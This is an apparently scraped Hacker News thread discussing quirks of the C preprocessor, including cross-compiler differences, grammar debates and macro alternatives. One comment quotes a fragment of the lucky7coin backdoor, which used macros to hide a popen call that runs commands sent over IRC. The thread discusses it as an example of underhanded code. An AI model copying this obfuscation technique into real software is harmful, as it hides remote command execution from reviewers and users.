Scandalous Weird Old Things About the C Preprocessor

97 points| robertelder | 10 years ago |blog.robertelder.org

41 comments

[+] pjc50|10 years ago|reply
The C preprocessor is a horrendous way of doing metaprogramming that was implemented because it was relatively easy to do as a separate pass. There's a reason why very few other languages have done it this way.

A good knowledge of the preprocessor is essential for writing obfuscated and underhanded C. For example, the lucky7coin backdoor: https://github.com/alerj78/lucky7coin/issues/1 where the code

  if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
  {
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
expands to

  if (vWords[1] == "PR" "IV" "M" "SG" && vWords[3] == ":!" && vWords[0].size() > 1)
  {
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
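
A minimal sketch of the string-splitting half of that trick, assuming CBuff was defined as the four adjacent literals shown in the expansion (the function name is hypothetical). Adjacent string literals are merged during translation, so a search of the source for "PRIVMSG" finds nothing:

```c
#include <string.h>

/* Assumed definition, modeled on the expansion shown above:
   the adjacent literals are concatenated into "PRIVMSG", so the
   word never appears whole in the source text. */
#define CBuff "PR" "IV" "M" "SG"

/* Hypothetical helper: returns 1 if word equals the hidden literal,
   0 otherwise. */
int is_hidden_command(const char *word)
{
    return strcmp(word, CBuff) == 0;
}
```

Calling is_hidden_command("PRIVMSG") returns 1, even though that string is never spelled out in the file.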
[+] DSMan195276|10 years ago|reply
IMO, whether or not the C preprocessor is good depends on what you're trying to do and how you do it. I doubt there are any preprocessors or macro systems that can't be used to obfuscate code - that's basically the definition of what they do: modify your code before you compile it. Obviously, any strange/unexplained preprocessor usage should be examined and preferably removed.

The example you gave is not really fair though, because it seems pretty obvious to me that nobody ever looked at that code - it hardly matters that they hid the backdoor in the C preprocessor. If you take a look at the repo, it only has three commits, with the first one (https://github.com/alerj78/lucky7coin/commit/07d7e5fc53e5673...) being a supposed import of the code from the repo it used to exist in, and it's in this commit that the backdoor was inserted. The real issue is that people were running code from someone who appears to be a complete unknown and has no history for his code, and they just assumed it was the same as the old code without checking.

[+] yid|10 years ago|reply
This is so absurdly simple and yet devastating. Reading some of the comments on the GitHub issue you posted, this stood out (I don't know anything about lucky7coin):

> So disappointing such code was not reviewed by Vern and team before running it on the server where damage could result.

So this code was actually put into production somewhere at some point -- wow. And cursory code review and compiling from source will do absolutely nothing here.

[+] kazinator|10 years ago|reply
Even if you limit yourself to a purely textual pass, you can implement much better preprocessing.
[+] nly|10 years ago|reply
Nothing a pass through -E and clang-format wouldn't reveal.
[+] evmar|10 years ago|reply
Here's one I recently learned about:

http://reviews.llvm.org/D15866

    #define FOO
    #define BAR defined(FOO)
    #if BAR
    ...
    #else
    ...
    #endif
clang and gcc will pick the #if branch while Visual Studio will take the #else branch.
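
For context, the C standard leaves the behavior undefined when the token `defined` is produced by macro expansion inside a #if, which is why compilers are allowed to disagree here. A portable sketch, assuming the intent is "BAR is true when FOO is defined", evaluates defined() directly and stores the result in a plain 0/1 macro (the function name is hypothetical):

```c
#define FOO

/* Evaluate defined() directly in a directive, then record the result
   in an ordinary 0/1 macro instead of hiding defined() in BAR. */
#if defined(FOO)
#define BAR 1
#else
#define BAR 0
#endif

/* Returns 1 when the #if branch was compiled, 0 for the #else branch. */
int branch_taken(void)
{
#if BAR
    return 1;
#else
    return 0;
#endif
}
```

Written this way, BAR expands to a plain integer constant, so every conforming preprocessor should pick the same branch.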
[+] rootbear|10 years ago|reply
Interesting. I don't think I ever tried to use a macro in the conditional expression of a #if, except inside a defined() or undef(). From my time on the C committee, I recall that the preprocessor was a royal pain to get right. It has its own set of token rules that aren't the same as C itself, for example.

I am also reminded of the button I used to have that said, "Defining define is undefined."

[+] random_upvoter|10 years ago|reply
There are quite a few differences between msvc and the other compilers. For instance:

  #define a(x,y) x+y
  void f(int i)
  {
      a(i,+);
  }
will compile without errors with cl but not with any other compiler.
[+] nkurz|10 years ago|reply
This doesn't seem quite right. Did you maybe mean "#undef FOO" or "! defined(FOO)"? Whether BAR gets expanded or not, in your example it looks like it would always evaluate true. Or am I misunderstanding the ambiguity?

It might be telling that I also don't understand the Clang bug report as written. I think there are typos in the examples. Is the switch from "HAVE_FOO_BAR" to "HAVE_FOO" in the first example intentional? Is the construct "#defined" (with a final 'd') intentional in the second?

[+] cyphar|10 years ago|reply
That just looks like a Visual Studio bug to me.
[+] speeder|10 years ago|reply
STLport (4.6 at least... I haven't checked 5.x) has lots and lots of these... I wonder how it doesn't crap out completely O.o
[+] colanderman|10 years ago|reply
#2 is incorrect. Being sensitive to line breaks does not make a grammar context-sensitive. It just means you have to treat line breaks as tokens rather than ignorable whitespace (which is exactly what the context-free grammar given in the C11 standard does).

Same with the bit about concatenating tokens. Every single one of those examples has a static parse tree, which, for the C preprocessor, is a sequence of tokens and directives. The author seems to be confusing the preprocessor's parse tree with the effect it has on the underlying text.

(Yes, the output of the preprocessor is dependent on what you define, but that has nothing to do with the grammar. What the author claims is like saying a Lisp is context-sensitive because the factorial function produces different values for different inputs!)

Now, if you could do this:

    #define foobar define
    #foobar x 123
    x
and get "123", that would be a context-sensitive grammar. But that is NOT a thing you can do!
[+] breadbox|10 years ago|reply
I hate to say it, but I was rather unimpressed by this list, and nothing in it surprised me. While I certainly agree that the C preprocessor is a relic, and has not weathered the test of time well, I would suggest that a number of the supposed infelicities mentioned in this article stem from the misleading idea that the preprocessor is an integral part of the C language proper, when it is better thought of as its own language (and one that was traditionally done by a completely separate program). The preprocessor does things differently than the rest of C, because it's not C. It is a text-processing language of convenience, provided specifically for doing things that C itself cannot (or should not) do.
[+] pklausler|10 years ago|reply
I've written a C preprocessor and I agree that the language standard documents are ambiguous and incomplete. The best I could do was hack on it until it matched GCC's preprocessor well enough to compile Linux.

I don't recall all the horrid details, but one case that I do remember driving me nuts was the use of #if/#endif in the argument to a function-like macro.
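
For reference, the standard says that preprocessing directives appearing inside the argument list of a function-like macro give undefined behavior, so implementations can differ on that case. A portable sketch hoists the conditional out of the call; the macro, flag, and function names below are hypothetical:

```c
#include <stdio.h>

/* Hypothetical function-like macro and feature flag, for illustration. */
#define FORMAT_INTO(buf, size, text) snprintf((buf), (size), "%s", (text))
#define USE_LONG_GREETING 1

/* Instead of writing #if/#endif between the parentheses of
   FORMAT_INTO(...), select the argument first and pass it as an
   ordinary macro. */
#if USE_LONG_GREETING
#define GREETING "hello, world"
#else
#define GREETING "hi"
#endif

/* Writes the selected greeting into buf; returns snprintf's result. */
int write_greeting(char *buf, size_t size)
{
    return FORMAT_INTO(buf, size, GREETING);
}
```

This avoids the ambiguous case entirely, at the cost of one extra macro name.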

[+] DubiousPusher|10 years ago|reply
Has there been any notion of a replacement Meta/Macro language for C? Something open source. Of course pre-preprocessing one's files and the complexity that might add to the build system are unattractive but I'd still be interested if someone has attacked this problem.
[+] ArkyBeagle|10 years ago|reply
Much of what makes 'C' annoying can be made less painful by referring to static/const struct tables/arrays. Those are a prime candidate for generation.

You don't have to keep the preprocessing of files as part of the mainline build, but there's something to be said for it - sort of "make GENERATE_ALL_THE_THINGS" might run the preprocessing { Python/Tcl/Perl/bash/even 'C' } scripts for you.

If the generators just emit .h files, that can be pretty good. You're still left with something #ifdef-ey to select them, based on #defines or -D options.

You might even go so far as to dynamically load these tables if that can make sense. The ld linker can directly link in blobs.
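
A minimal sketch of what such a generated table could look like, assuming a script emits a header of error codes (the struct, table contents, and function name are all hypothetical, and the array is written by hand here):

```c
#include <stddef.h>

/* Hypothetical contents of a generated header such as "error_table.h".
   A generator script would emit the array below. */
struct error_entry {
    int code;
    const char *name;
};

static const struct error_entry error_table[] = {
    { 1, "ERR_NOT_FOUND" },
    { 2, "ERR_TIMEOUT"   },
    { 3, "ERR_DENIED"    },
};

/* Linear lookup by code; returns NULL when the code is not in the table. */
const char *error_name(int code)
{
    size_t i;
    for (i = 0; i < sizeof error_table / sizeof error_table[0]; i++) {
        if (error_table[i].code == code)
            return error_table[i].name;
    }
    return NULL;
}
```

The hand-written code only ever touches error_name(), so regenerating the table does not require any macro tricks in the callers.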

[+] pcwalton|10 years ago|reply
The module and template features (along with static if, if the committees figure out what to do in that area) in the newest versions of C++ together get pretty close to replacing the C preprocessor.
[+] ctstover|10 years ago|reply
My school of thought would be to limit it to just #include, #if, #else, #endif, and non-recursive single-word-only #define / #undef. Force everything to be one per line, and call it a day.

Macros should always be the absolute last resort to doing anything. Stepping through code in gdb with some "creative" macro-based API is almost as bad as C++.

[+] cyphar|10 years ago|reply
I'm 95% sure the last example in #3 is undefined behaviour. #(a b c) is not valid, so evaluating it with multiple levels of indirection probably is a compiler bug for not erroring out.
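
For comparison, this is the well-defined two-level stringification idiom, not the article's example (which isn't reproduced in this thread). The macro names and the VERSION value are illustrative assumptions:

```c
#include <string.h>

#define STR(x)  #x        /* stringifies the argument exactly as written */
#define XSTR(x) STR(x)    /* expands the argument first, then stringifies */
#define VERSION 42        /* hypothetical value for illustration */

/* Returns 1 if STR(VERSION) is "VERSION" and XSTR(VERSION) is "42". */
int stringify_matches(void)
{
    return strcmp(STR(VERSION), "VERSION") == 0
        && strcmp(XSTR(VERSION), "42") == 0;
}
```

Here # is always followed by a macro parameter, which is what the standard requires inside a function-like macro.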
[+] cyphar|10 years ago|reply
And the last 3 or 4 are odd, but they were needed for some of the hacks common in the early days of C (and some are almost certainly used in the Linux kernel source today).
[+] biot|10 years ago|reply
Kind of click-baity, no? Though the title is missing "You won't believe what happens next... developers hate it!"